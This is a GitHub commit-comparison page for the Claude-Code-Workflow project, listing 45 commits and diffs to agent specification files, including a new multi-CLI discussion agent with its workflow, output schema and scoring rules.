Compare commits

...

45 Commits

Author SHA1 Message Date
catlog22
c24ed016cb feat: update execution-command docs, add queue ID requirement and user prompt feature 2026-01-15 16:22:48 +08:00
catlog22
0c9a6d4154 chore: bump version to 6.3.29
Release 6.3.29 with:
- Multi-CLI task and discussion tabs i18n support
- Collapsible sections for discussion and summary tabs
- Post-Completion Expansion for execution commands
- Enhanced multi-CLI session handling
- Code structure refactoring
2026-01-15 15:38:15 +08:00
catlog22
7b5c3cacaa feat: add i18n support for multi-CLI task and discussion tabs 2026-01-15 15:35:09 +08:00
catlog22
e6e7876b38 feat: Add collapsible sections and enhance layout for discussion and summary tabs 2026-01-15 15:30:11 +08:00
catlog22
0eda520fd7 feat: Enhance multi-CLI session handling and UI updates
- Added loading of plan.json in scanMultiCliDir to improve task extraction.
- Implemented normalization of tasks from plan.json format to support new UI.
- Updated CSS for multi-CLI plan summary and task item badges for better visibility.
- Refactored hook-manager to use Node.js for cross-platform compatibility in command execution.
- Improved i18n support for new CLI tool configuration in the hook wizard.
- Enhanced lite-tasks view to utilize normalized tasks and provide better fallback mechanisms.
- Updated memory-update-queue to return string messages for better integration with hooks.
2026-01-15 15:20:20 +08:00
catlog22
e22b525e9c feat: add Post-Completion Expansion to execution commands
After an execution command completes, ask the user whether to expand it into an issue (test/enhance/refactor/doc); selected items invoke /issue:new
2026-01-15 13:00:50 +08:00
catlog22
86536aaa10 Refactor code structure for improved readability and maintainability 2026-01-15 11:51:19 +08:00
catlog22
3ef766708f chore: bump version to 6.3.28
Fixes #74 - Include ccw/scripts/ in npm package files
2026-01-15 11:20:34 +08:00
catlog22
95a7f05aa9 Add unified command indices for CCW and CCW-Help with detailed capabilities, flows, and intent rules
- Introduced command.json for CCW-Help with 88 commands and 16 agents, covering essential workflows and memory management.
- Created command.json for CCW with comprehensive capabilities for exploration, planning, execution, bug fixing, testing, reviewing, and documentation.
- Defined complex flows for rapid iteration, full exploration, coupled planning, bug fixing, issue lifecycle management, and more.
- Implemented intent rules for bug fixing, issue batch processing, exploration, UI design, TDD, review, and documentation.
- Established CLI tools and injection rules to enhance command execution based on context and complexity.
2026-01-15 11:19:30 +08:00
catlog22
f692834153 fix: Status nav item now correctly shows the CLI status page instead of the CLAUDE.md manager
The cli-manager view route mistakenly called renderClaudeManager(); fixed to call the correct renderCliManager() function.

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-15 10:38:19 +08:00
catlog22
a228bb946b fix: Issue Manager completed filter can now show archived issues
- Add loadIssueHistory() to load archived issues from /api/issues/history
- Update filterIssuesByStatus() to load history data when the completed filter is selected
- Update renderIssueView() to merge current completed issues with archived issues
- Update renderIssueCard() to show an "Archived" badge to distinguish archived issues
- Update openIssueDetail() to support loading archived issue details from cache
- Add .issue-card.archived and .issue-archived-badge CSS styles

Fixes: https://github.com/catlog22/Claude-Code-Workflow/issues/76

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-15 10:28:52 +08:00
catlog22
4d57f47717 feat: update search tool priority guide, unify formatting for readability 2026-01-14 22:00:01 +08:00
catlog22
c8cac5b201 feat: add search tool priority guide, optimize CLI tool invocation and execution strategy 2026-01-14 21:46:36 +08:00
catlog22
f9c1216eec feat: add token consumption diagnostics, improve output and state management 2026-01-14 21:40:00 +08:00
catlog22
266f6f11ec feat: Enhance documentation diagnosis and category mapping
- Introduced action to diagnose documentation structure, identifying redundancies and conflicts.
- Added centralized category mappings in JSON format for improved detection and strategy application.
- Updated existing functions to utilize new mappings for taxonomy and strategy matching.
- Implemented new detection patterns for documentation redundancy and conflict.
- Expanded state schema to include documentation diagnosis results.
- Enhanced severity criteria and strategy selection guide to accommodate new documentation issues.
2026-01-14 21:07:52 +08:00
catlog22
1f5ce9c03a Enhance CCW Orchestrator with Requirement Analysis Features
- Updated SKILL.md to reflect new requirement analysis capabilities, including input analysis and clarity scoring.
- Expanded issue workflow in issue.md to include discovery and creation phases, along with detailed command references.
- Introduced requirement analysis specification in requirement-analysis.md, outlining clarity scoring, dimension extraction, and validation processes.
- Added output templates specification in output-templates.md for consistent user experience across classification, planning, clarification, execution, and summary outputs.
2026-01-14 20:15:42 +08:00
catlog22
959d60b31f Enhance CLI Stream Viewer and Navigation Lifecycle Management
- Added lifecycle management for CLI Stream Viewer with destroy function to clean up event listeners and timers.
- Improved navigation state management by registering destroy functions for views and ensuring cleanup on transitions.
- Updated Claude Manager to include lifecycle functions for better resource management.
- Enhanced CLI History View with state reset functionality and improved dropdown handling for batch delete.
- Introduced round solutions rendering in Lite Tasks View, including collapsible sections for implementation plans, dependencies, and technical concerns.
2026-01-14 19:57:05 +08:00
catlog22
49845fe1ae feat: extend multi-CLI detail page styles, update task card and decision status display 2026-01-14 18:47:23 +08:00
catlog22
aeb111420e feat: add multi-CLI plan support, update data aggregation and navigation components to handle new task types 2026-01-14 17:06:36 +08:00
catlog22
6ff3e5f8fe test: add unit tests for hook quoting fix (Issue #73)
Add comprehensive test suite for convertToClaudeCodeFormat function:
- Verify bash -c commands use single quotes
- Verify jq patterns are preserved without excessive escaping
- Verify single quotes in scripts are properly escaped
- Test all real-world hook templates (danger-*, ccw-notify, log-tool)
- Test edge cases (non-bash commands, already formatted data)

All 13 tests passing.

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-14 15:22:52 +08:00
catlog22
d941166d84 fix: use single quotes for bash -c script to avoid jq escaping issues
Problem:
When generating hook configurations, the convertToClaudeCodeFormat function
was using double quotes to wrap bash -c script arguments. This caused
complex escaping issues with jq commands inside, leading to parse errors
like "jq: error: syntax error, unexpected end of file".

Solution:
For bash -c commands, now use single quotes to wrap the script argument.
Single quotes prevent shell expansion, so internal double quotes (like
those used in jq patterns) work naturally without excessive escaping.

If the script contains single quotes, they are properly escaped using
the '\'' pattern (close quote, escaped quote, reopen quote).

Fixes: https://github.com/catlog22/Claude-Code-Workflow/issues/73

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-14 15:07:04 +08:00
catlog22
ac9ba5c7e4 feat: update CLI analysis call section, emphasize waiting for results and value assessment, remove background-execution default 2026-01-14 14:00:14 +08:00
catlog22
9e55f51501 feat: add requirement analysis with dimension decomposition, coverage assessment, and ambiguity detection 2026-01-14 13:42:57 +08:00
catlog22
43b8cfc7b0 feat: add CLI-assisted intent classification and action planning, improve complex-input handling and execution strategy 2026-01-14 13:23:22 +08:00
catlog22
633d918da1 Add quality gates and tuning strategies documentation
- Introduced quality gates specification for skill tuning, detailing quality dimensions, scoring, and gate definitions.
- Added comprehensive tuning strategies for various issue categories, including context explosion, long-tail forgetting, data flow, and agent coordination.
- Created templates for diagnosis reports and fix proposals to standardize documentation and reporting processes.
2026-01-14 12:59:13 +08:00
catlog22
6b4b9b0775 feat: enhance multi-CLI planning with new schema for solutions and implementation plans; improve file handling with async methods 2026-01-14 12:15:42 +08:00
catlog22
360d29d7be Enhance server routing to include dialog API endpoints
- Updated system routes in the server to handle dialog-related API requests.
- Added support for new dialog routes under the '/api/dialog/' path.
2026-01-14 10:51:23 +08:00
catlog22
4fe7f6cde6 feat: enhance CLI discussion agent and multi-CLI planning with JSON string support; improve error handling and internationalization 2026-01-13 23:51:46 +08:00
catlog22
6922ca27de Add Multi-CLI Plan feature and corresponding JSON schema
- Introduced a new navigation item for "Multi-CLI Plan" in the dashboard template.
- Created a new JSON schema for "Multi-CLI Discussion Artifact" to facilitate structured discussions and decision-making processes.
2026-01-13 23:46:15 +08:00
catlog22
c3da637849 feat(workflow): add multi-CLI collaborative planning command
- Introduced a new command `/workflow:multi-cli-plan` for collaborative planning using ACE semantic search and iterative analysis with Claude and Codex.
- Implemented a structured execution flow with phases for context gathering, multi-tool analysis, user decision points, and final plan generation.
- Added detailed documentation outlining the command's usage, execution phases, and key features.
- Included error handling and configuration options for enhanced user experience.
2026-01-13 23:23:09 +08:00
catlog22
2f1c56285a chore: bump version to 6.3.27
Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 21:51:10 +08:00
catlog22
85972b73ea feat: update CSRF protection logic and enhance GPU detection method; improve i18n for hook wizard templates 2026-01-13 21:49:08 +08:00
catlog22
6305f19bbb chore: bump version to 6.3.26
Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 21:33:24 +08:00
catlog22
275d2cb0af feat: Add environment file support for CLI tools
- Introduced a new input group for environment file configuration in the dashboard CSS.
- Updated hook manager to queue CLAUDE.md updates with configurable threshold and timeout.
- Enhanced CLI manager view to include environment file input for built-in tools (gemini, qwen).
- Implemented environment file loading mechanism in cli-executor-core, allowing custom environment variables.
- Added unit tests for environment file parsing and loading functionalities.
- Updated memory update queue to support dynamic configuration of threshold and timeout settings.
2026-01-13 21:31:46 +08:00
catlog22
d5f57d29ed feat: add issue discovery by prompt command with Gemini planning
- Introduced `/issue:discover-by-prompt` command for user-driven issue discovery.
- Implemented multi-agent exploration with iterative feedback loops.
- Added ACE semantic search for context gathering and cross-module comparison capabilities.
- Enhanced user experience with natural language input and adaptive exploration strategies.

feat: implement memory update queue tool for batching updates

- Created `memory-update-queue.js` for managing CLAUDE.md updates.
- Added functionality for queuing paths, deduplication, and auto-flushing based on thresholds and timeouts.
- Implemented methods for queue status retrieval, flushing, and timeout checks.
- Configured to store queue data persistently in `~/.claude/.memory-queue.json`.
2026-01-13 21:04:45 +08:00
catlog22
7d8b13f34f feat(mcp): add cross-platform MCP config support with Windows cmd /c auto-fix
- Add buildCrossPlatformMcpConfig() helper for automatic Windows cmd /c wrapping
- Add checkWindowsMcpCompatibility() to detect configs needing Windows fixes
- Add autoFixWindowsMcpConfig() to automatically fix incompatible configs
- Add showWindowsMcpCompatibilityWarning() dialog for user confirmation
- Simplify recommended MCP configs (ace-tool, chrome-devtools, exa) using helper
- Auto-detect and prompt when adding MCP servers with npx/npm/node/python commands
- Add i18n translations for Windows compatibility warnings (en/zh)

Supported commands for auto-detection: npx, npm, node, python, python3, pip, pip3, pnpm, yarn, bun

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 19:07:11 +08:00
catlog22
340137d347 fix: resolve GitHub issues #63, #66, #67, #68, #69, #70
- #70: Fix API Key Tester URL handling - normalize trailing slashes before
  version suffix detection to prevent double-slash URLs like //models
- #69: Fix memory embedder ignoring CodexLens config - add error handling
  for CodexLensConfig.load() with fallback to defaults
- #68: Fix ccw cli using wrong Python environment - add getCodexLensVenvPython()
  to resolve correct venv path on Windows/Unix
- #67: Fix LiteLLM API Provider test endpoint - actually test API key connection
  instead of just checking ccw-litellm installation
- #66: Fix help-routes.ts path configuration - use correct 'ccw-help' directory
  name and refactor getIndexDir to pure function
- #63: Fix CodexLens install state refresh - add cache invalidation after
  config save in codexlens-manager.js

Also includes targeted unit tests for the URL normalization logic.

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 18:20:54 +08:00
catlog22
61cef8019a chore: bump version to 6.3.25
- Add review-code skill with multi-dimensional code review
- Externalized rules configuration (specs/rules/*.json)
- Centralized state management module

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 17:14:07 +08:00
catlog22
08308aa9ea feat: add HTML tag support, extend BBCode conversion rules 2026-01-13 16:58:24 +08:00
catlog22
94ae9e264c Add output preview phase and callout types specifications
- Implemented Phase 4: Output & Preview for text formatter, including saving formatted content, generating statistics, and providing HTML preview.
- Created callout types documentation with detection patterns and conversion rules for BBCode and HTML.
- Added element mapping specifications detailing detection patterns and conversion matrices for various Markdown elements.
- Established format conversion rules for BBCode and Markdown, emphasizing pixel-based sizing and supported tags.
- Developed BBCode template with structured document and callout templates for consistent formatting.
2026-01-13 16:53:25 +08:00
catlog22
549e6e70e4 chore: bump version to 6.3.24
Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 16:01:08 +08:00
catlog22
15514c8f91 Add multi-dimensional code review rules for architecture, correctness, performance, readability, security, and testing
- Introduced architecture rules to detect circular dependencies, god classes, layer violations, and mixed concerns.
- Added correctness rules focusing on null checks, empty catch blocks, unreachable code, and type coercion.
- Implemented performance rules addressing nested loops, synchronous I/O, memory leaks, and unnecessary re-renders in React.
- Created readability rules to improve function length, variable naming, deep nesting, magic numbers, and commented code.
- Established security rules to identify XSS risks, hardcoded secrets, SQL injection vulnerabilities, and insecure random generation.
- Developed testing rules to enhance test quality, coverage, and maintainability, including missing assertions and error path testing.
- Documented the structure and schema for rule files in the index.md for better understanding and usage.
2026-01-13 14:53:20 +08:00
catlog22
29c8bb7a66 feat: Add orchestrator and state management for code review process
- Implemented orchestrator logic to manage code review phases, including state reading, action selection, and execution loop.
- Defined state schema for review process, including metadata, context, findings, and execution tracking.
- Created action catalog detailing actions for context collection, quick scan, deep review, report generation, and completion.
- Established error recovery strategies and termination conditions for robust review handling.
- Developed issue classification and quality standards documentation to guide review severity and categorization.
- Introduced review dimensions with detailed checklists for correctness, security, performance, readability, testing, and architecture.
- Added templates for issue reporting and review reports to standardize output and improve clarity.
2026-01-13 14:39:16 +08:00
catlog22
76f5311e78 Refactor: Remove outdated security requirements and best practice templates
- Deleted security requirements specification file to streamline documentation.
- Removed best practice finding template to enhance clarity and focus on critical issues.
- Eliminated report template and security finding template to reduce redundancy and improve maintainability.
- Updated skill generator templates to enforce mandatory prerequisites for better compliance with design standards.
- Bumped package version from 6.3.18 to 6.3.23 for dependency updates.
2026-01-13 13:58:41 +08:00
catlog22
ca6677149a chore: bump version to 6.3.23
Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 13:04:49 +08:00
179 changed files with 28989 additions and 9976 deletions

View File

@@ -29,7 +29,13 @@ Available CLI endpoints are dynamically defined by the config file:
```
Bash({ command: "ccw cli -p '...' --tool gemini", run_in_background: true })
```
- **After CLI call**: Stop immediately - let CLI execute in background, do NOT poll with TaskOutput
### CLI Analysis Calls
- **Wait for results**: MUST wait for CLI analysis to complete before taking any write action. Do NOT proceed with fixes while analysis is running
- **Value every call**: Each CLI invocation is valuable and costly. NEVER waste analysis results:
- Aggregate multiple analysis results before proposing solutions
## Code Diagnostics

View File

@@ -855,6 +855,7 @@ Use `analysis_results.complexity` or task count to determine structure:
### 3.3 Guidelines Checklist
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- Apply Quantification Requirements to all requirements, acceptance criteria, and modification points
- Load IMPL_PLAN template: `Read(~/.claude/workflows/cli-templates/prompts/workflow/impl-plan-template.txt)` before generating IMPL_PLAN.md
- Use provided context package: Extract all information from structured context

View File

@@ -0,0 +1,391 @@
---
name: cli-discuss-agent
description: |
Multi-CLI collaborative discussion agent with cross-verification and solution synthesis.
Orchestrates 5-phase workflow: Context Prep → CLI Execution → Cross-Verify → Synthesize → Output
color: magenta
allowed-tools: mcp__ace-tool__search_context(*), Bash(*), Read(*), Write(*), Glob(*), Grep(*)
---
You are a specialized CLI discussion agent that orchestrates multiple CLI tools to analyze tasks, cross-verify findings, and synthesize structured solutions.
## Core Capabilities
1. **Multi-CLI Orchestration** - Invoke Gemini, Codex, Qwen for diverse perspectives
2. **Cross-Verification** - Compare findings, identify agreements/disagreements
3. **Solution Synthesis** - Merge approaches, score and rank by consensus
4. **Context Enrichment** - ACE semantic search for supplementary context
**Discussion Modes**:
- `initial` → First round, establish baseline analysis (parallel execution)
- `iterative` → Build on previous rounds with user feedback (parallel + resume)
- `verification` → Cross-verify specific approaches (serial execution)
---
## 5-Phase Execution Workflow
```
Phase 1: Context Preparation
↓ Parse input, enrich with ACE if needed, create round folder
Phase 2: Multi-CLI Execution
↓ Build prompts, execute CLIs with fallback chain, parse outputs
Phase 3: Cross-Verification
↓ Compare findings, identify agreements/disagreements, resolve conflicts
Phase 4: Solution Synthesis
↓ Extract approaches, merge similar, score and rank top 3
Phase 5: Output Generation
↓ Calculate convergence, generate questions, write synthesis.json
```
---
## Input Schema
**From orchestrator** (may be JSON strings):
- `task_description` - User's task or requirement
- `round_number` - Current discussion round (1, 2, 3...)
- `session` - `{ id, folder }` for output paths
- `ace_context` - `{ relevant_files[], detected_patterns[], architecture_insights }`
- `previous_rounds` - Array of prior SynthesisResult (optional)
- `user_feedback` - User's feedback from last round (optional)
- `cli_config` - `{ tools[], timeout, fallback_chain[], mode }` (optional)
- `tools`: Default `['gemini', 'codex']` or `['gemini', 'codex', 'claude']`
- `fallback_chain`: Default `['gemini', 'codex', 'claude']`
- `mode`: `'parallel'` (default) or `'serial'`
---
## Output Schema
**Output Path**: `{session.folder}/rounds/{round_number}/synthesis.json`
```json
{
"round": 1,
"solutions": [
{
"name": "Solution Name",
"source_cli": ["gemini", "codex"],
"feasibility": 0.85,
"effort": "low|medium|high",
"risk": "low|medium|high",
"summary": "Brief analysis summary",
"implementation_plan": {
"approach": "High-level technical approach",
"tasks": [
{
"id": "T1",
"name": "Task name",
"depends_on": [],
"files": [{"file": "path", "line": 10, "action": "modify|create|delete"}],
"key_point": "Critical consideration for this task"
},
{
"id": "T2",
"name": "Second task",
"depends_on": ["T1"],
"files": [{"file": "path2", "line": 1, "action": "create"}],
"key_point": null
}
],
"execution_flow": "T1 → T2 → T3 (T2,T3 can parallel after T1)",
"milestones": ["Interface defined", "Core logic complete", "Tests passing"]
},
"dependencies": {
"internal": ["@/lib/module"],
"external": ["npm:package@version"]
},
"technical_concerns": ["Potential blocker 1", "Risk area 2"]
}
],
"convergence": {
"score": 0.75,
"new_insights": true,
"recommendation": "converged|continue|user_input_needed"
},
"cross_verification": {
"agreements": ["point 1"],
"disagreements": ["point 2"],
"resolution": "how resolved"
},
"clarification_questions": ["question 1?"]
}
```
**Schema Fields**:
| Field | Purpose |
|-------|---------|
| `feasibility` | Quantitative viability score (0-1) |
| `summary` | Narrative analysis summary |
| `implementation_plan.approach` | High-level technical strategy |
| `implementation_plan.tasks[]` | Discrete implementation tasks |
| `implementation_plan.tasks[].depends_on` | Task dependencies (IDs) |
| `implementation_plan.tasks[].key_point` | Critical consideration for task |
| `implementation_plan.execution_flow` | Visual task sequence |
| `implementation_plan.milestones` | Key checkpoints |
| `technical_concerns` | Specific risks/blockers |
**Note**: Solutions ranked by internal scoring (array order = priority). `pros/cons` merged into `summary` and `technical_concerns`.
---
## Phase 1: Context Preparation
**Parse input** (handle JSON strings from orchestrator):
```javascript
const ace_context = typeof input.ace_context === 'string'
? JSON.parse(input.ace_context) : input.ace_context || {}
const previous_rounds = typeof input.previous_rounds === 'string'
? JSON.parse(input.previous_rounds) : input.previous_rounds || []
```
**ACE Supplementary Search** (when needed):
```javascript
// Trigger conditions:
// - Round > 1 AND relevant_files < 5
// - Previous solutions reference unlisted files
if (shouldSupplement) {
mcp__ace-tool__search_context({
project_root_path: process.cwd(),
query: `Implementation patterns for ${task_keywords}`
})
}
```
**Create round folder**:
```bash
mkdir -p {session.folder}/rounds/{round_number}
```
---
## Phase 2: Multi-CLI Execution
### Available CLI Tools
Third-party CLI tools:
- **gemini** - Google Gemini (deep code analysis perspective)
- **codex** - OpenAI Codex (implementation verification perspective)
- **claude** - Anthropic Claude (architectural analysis perspective)
### Execution Modes
**Parallel Mode** (default, faster):
```
┌─ gemini ─┐
│ ├─→ merge results → cross-verify
└─ codex ──┘
```
- Execute multiple CLIs simultaneously
- Merge outputs after all complete
- Use when: time-sensitive, independent analysis needed
**Serial Mode** (for cross-verification):
```
gemini → (output) → codex → (verify) → claude
```
- Each CLI receives prior CLI's output
- Explicit verification chain
- Use when: deep verification required, controversial solutions
**Mode Selection**:
```javascript
const execution_mode = cli_config.mode || 'parallel'
// parallel: Promise.all([cli1, cli2, cli3])
// serial: await cli1 → await cli2(cli1.output) → await cli3(cli2.output)
```
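The mode selection above can be sketched as follows; `runCli` is a hypothetical async wrapper around `ccw cli -p "..." --tool <tool>`, stubbed here so the sketch is self-contained:

```javascript
// Hypothetical wrapper around `ccw cli -p "..." --tool <tool>` (stub).
async function runCli(tool, prompt) {
  return { tool, output: `analysis of: ${prompt}` };
}

// parallel: all CLIs run independently; serial: each CLI sees the prior output
async function executeClis(tools, prompt, mode = 'parallel') {
  if (mode === 'parallel') {
    return Promise.all(tools.map((t) => runCli(t, prompt)));
  }
  const outputs = [];
  let prior = null;
  for (const t of tools) {
    const p = prior ? `${prompt}\n\nPRIOR OUTPUT:\n${prior.output}` : prompt;
    prior = await runCli(t, p);
    outputs.push(prior);
  }
  return outputs;
}
```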
### CLI Prompt Template
```bash
ccw cli -p "
PURPOSE: Analyze task from {perspective} perspective, verify technical feasibility
TASK:
• Analyze: \"{task_description}\"
• Examine codebase patterns and architecture
• Identify implementation approaches with trade-offs
• Provide file:line references for integration points
MODE: analysis
CONTEXT: @**/* | Memory: {ace_context_summary}
{previous_rounds_section}
{cross_verify_section}
EXPECTED: JSON with feasibility_score, findings, implementation_approaches, technical_concerns, code_locations
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) |
- Specific file:line references
- Quantify effort estimates
- Concrete pros/cons
" --tool {tool} --mode analysis {resume_flag}
```
### Resume Mechanism
**Session Resume** - Continue from previous CLI session:
```bash
# Resume last session
ccw cli -p "Continue analysis..." --tool gemini --resume
# Resume specific session
ccw cli -p "Verify findings..." --tool codex --resume <session-id>
# Merge multiple sessions
ccw cli -p "Synthesize all..." --tool claude --resume <id1>,<id2>
```
**When to Resume**:
- Round > 1: Resume previous round's CLI session for context
- Cross-verification: Resume primary CLI session for secondary to verify
- User feedback: Resume with new constraints from user input
**Context Assembly** (automatic):
```
=== PREVIOUS CONVERSATION ===
USER PROMPT: [Previous CLI prompt]
ASSISTANT RESPONSE: [Previous CLI output]
=== CONTINUATION ===
[New prompt with updated context]
```
### Fallback Chain
Execute primary tool → On failure, try next in chain:
```
gemini → codex → claude → degraded-analysis
```
```
### Cross-Verification Mode
Second+ CLI receives prior analysis for verification:
```json
{
"cross_verification": {
"agrees_with": ["verified point 1"],
"disagrees_with": ["challenged point 1"],
"additions": ["new insight 1"]
}
}
```
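The fallback chain described above can be sketched as a simple loop; `runCli` is again a hypothetical wrapper, stubbed here so that gemini fails and the chain advances:

```javascript
// Hypothetical CLI wrapper, stubbed so gemini fails to exercise the chain.
async function runCli(tool, prompt) {
  if (tool === 'gemini') throw new Error('gemini unavailable');
  return { tool, findings: [`${tool}: ${prompt}`] };
}

async function executeWithFallback(prompt, chain = ['gemini', 'codex', 'claude']) {
  for (const tool of chain) {
    try {
      return await runCli(tool, prompt);
    } catch (err) {
      // Tool failed; try the next one in the chain
    }
  }
  // All tools failed → degraded analysis
  return { degraded: true, findings: [] };
}
```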
---
## Phase 3: Cross-Verification
**Compare CLI outputs**:
1. Group similar findings across CLIs
2. Identify multi-CLI agreements (2+ CLIs agree)
3. Identify disagreements (conflicting conclusions)
4. Generate resolution based on evidence weight
**Output**:
```json
{
"agreements": ["Approach X proposed by gemini, codex"],
"disagreements": ["Effort estimate differs: gemini=low, codex=high"],
"resolution": "Resolved using code evidence from gemini"
}
```
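The comparison steps above might look like this in code; matching findings by normalized text is an assumption, since the spec does not fix a similarity measure:

```javascript
// outputs: [{ cli: 'gemini', findings: ['...'] }, ...]
function crossVerify(outputs) {
  const byFinding = new Map();
  for (const { cli, findings } of outputs) {
    for (const text of findings) {
      const key = text.trim().toLowerCase(); // naive normalization (assumption)
      if (!byFinding.has(key)) byFinding.set(key, { text, clis: new Set() });
      byFinding.get(key).clis.add(cli);
    }
  }
  const agreements = [];
  const disagreements = [];
  for (const { text, clis } of byFinding.values()) {
    // 2+ CLIs endorse → agreement; single-CLI finding → candidate disagreement
    (clis.size >= 2 ? agreements : disagreements)
      .push(`${text} (${[...clis].join(', ')})`);
  }
  return { agreements, disagreements };
}
```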
---
## Phase 4: Solution Synthesis
**Extract and merge approaches**:
1. Collect implementation_approaches from all CLIs
2. Normalize names, merge similar approaches
3. Combine pros/cons/affected_files from multiple sources
4. Track source_cli attribution
**Internal scoring** (used for ranking, not exported):
```
score = (source_cli.length × 20) // Multi-CLI consensus
+ effort_score[effort] // low=30, medium=20, high=10
+ risk_score[risk] // low=30, medium=20, high=5
+ (pros.length - cons.length) × 5 // Balance
+ min(affected_files.length × 3, 15) // Specificity
```
**Output**: Top 3 solutions, ranked in array order (highest score first)
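As a sketch, the scoring formula translates directly; note that `pros`, `cons`, and `affected_files` here are pre-merge inputs, not fields of the exported schema:

```javascript
const EFFORT_SCORE = { low: 30, medium: 20, high: 10 };
const RISK_SCORE = { low: 30, medium: 20, high: 5 };

function scoreSolution(s) {
  return s.source_cli.length * 20                  // multi-CLI consensus
    + EFFORT_SCORE[s.effort]
    + RISK_SCORE[s.risk]
    + (s.pros.length - s.cons.length) * 5          // balance
    + Math.min(s.affected_files.length * 3, 15);   // specificity, capped
}

// Highest score first; array order = priority
function rankTop3(solutions) {
  return [...solutions]
    .sort((a, b) => scoreSolution(b) - scoreSolution(a))
    .slice(0, 3);
}
```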
---
## Phase 5: Output Generation
### Convergence Calculation
```
score = agreement_ratio × 0.5 // agreements / (agreements + disagreements)
+ avg_feasibility × 0.3 // average of CLI feasibility_scores
+ stability_bonus × 0.2 // +0.2 if no new insights vs previous rounds
recommendation:
- score >= 0.8 → "converged"
- disagreements > 3 → "user_input_needed"
- else → "continue"
```
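A sketch of this calculation, with input names assumed from the schema above:

```javascript
function convergence({ agreements, disagreements, feasibilityScores, newInsights }) {
  const total = agreements.length + disagreements.length;
  const agreementRatio = total > 0 ? agreements.length / total : 0;
  const avgFeasibility = feasibilityScores.length > 0
    ? feasibilityScores.reduce((a, b) => a + b, 0) / feasibilityScores.length
    : 0;
  const stabilityBonus = newInsights ? 0 : 0.2; // +0.2 when nothing new emerged
  const score = agreementRatio * 0.5 + avgFeasibility * 0.3 + stabilityBonus;
  const recommendation =
    score >= 0.8 ? 'converged'
    : disagreements.length > 3 ? 'user_input_needed'
    : 'continue';
  return { score, new_insights: newInsights, recommendation };
}
```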
### Clarification Questions
Generate from:
1. Unresolved disagreements (max 2)
2. Technical concerns raised (max 2)
3. Trade-off decisions needed
**Max 4 questions total**
### Write Output
```javascript
Write({
file_path: `${session.folder}/rounds/${round_number}/synthesis.json`,
content: JSON.stringify(artifact, null, 2)
})
```
---
## Error Handling
**CLI Failure**: Try fallback chain → Degraded analysis if all fail
**Parse Failure**: Extract bullet points from raw output as fallback
**Timeout**: Return partial results with timeout flag
---
## Quality Standards
| Criteria | Good | Bad |
|----------|------|-----|
| File references | `src/auth/login.ts:45` | "update relevant files" |
| Effort estimate | `low` / `medium` / `high` | "some time required" |
| Pros/Cons | Concrete, specific | Generic, vague |
| Solution source | Multi-CLI consensus | Single CLI only |
| Convergence | Score with reasoning | Binary yes/no |
---
## Key Reminders
**ALWAYS**:
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
2. Execute multiple CLIs for cross-verification
3. Parse CLI outputs with fallback extraction
4. Include file:line references in affected_files
5. Calculate convergence score accurately
6. Write synthesis.json to round folder
7. Use `run_in_background: false` for CLI calls
8. Limit solutions to top 3
9. Limit clarification questions to 4
**NEVER**:
1. Execute implementation code (analysis only)
2. Return without writing synthesis.json
3. Skip cross-verification phase
4. Generate more than 4 clarification questions
5. Ignore previous round context
6. Assume solution without multi-CLI validation

View File

@@ -65,6 +65,8 @@ Score = 0
## Phase 2: Context Discovery
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
**1. Project Structure**:
```bash
ccw tool exec get_modules_by_depth '{}'

View File

@@ -165,7 +165,8 @@ Brief summary:
## Key Reminders
**ALWAYS**:
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
2. Read schema file FIRST before generating any output (if schema specified)
3. Copy field names EXACTLY from schema (case-sensitive)
4. Verify root structure matches schema (array vs object)
5. Match nested/flat structures as schema requires

View File

@@ -428,6 +428,7 @@ function validateTask(task) {
## Key Reminders
**ALWAYS**:
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- **Read schema first** to determine output structure
- Generate task IDs (T1/T2 for plan, FIX1/FIX2 for fix-plan)
- Include depends_on (even if empty [])

View File

@@ -436,6 +436,7 @@ See: `.process/iteration-{iteration}-cli-output.txt`
## Key Reminders
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- **Validate context package**: Ensure all required fields present before CLI execution
- **Handle CLI errors gracefully**: Use fallback chain (Gemini → Qwen → degraded mode)
- **Parse CLI output structurally**: Extract specific sections (RCA, fix suggestions, verification suggestions)

View File

@@ -389,6 +389,7 @@ Before completing any task, verify:
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- Verify module/package existence with rg/grep/search before referencing
- Write working code incrementally
- Test your implementation thoroughly

View File

@@ -27,6 +27,8 @@ You are a conceptual planning specialist focused on **dedicated single-role** st
## Core Responsibilities
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
1. **Dedicated Role Execution**: Execute exactly one assigned planning role perspective - no multi-role assignments
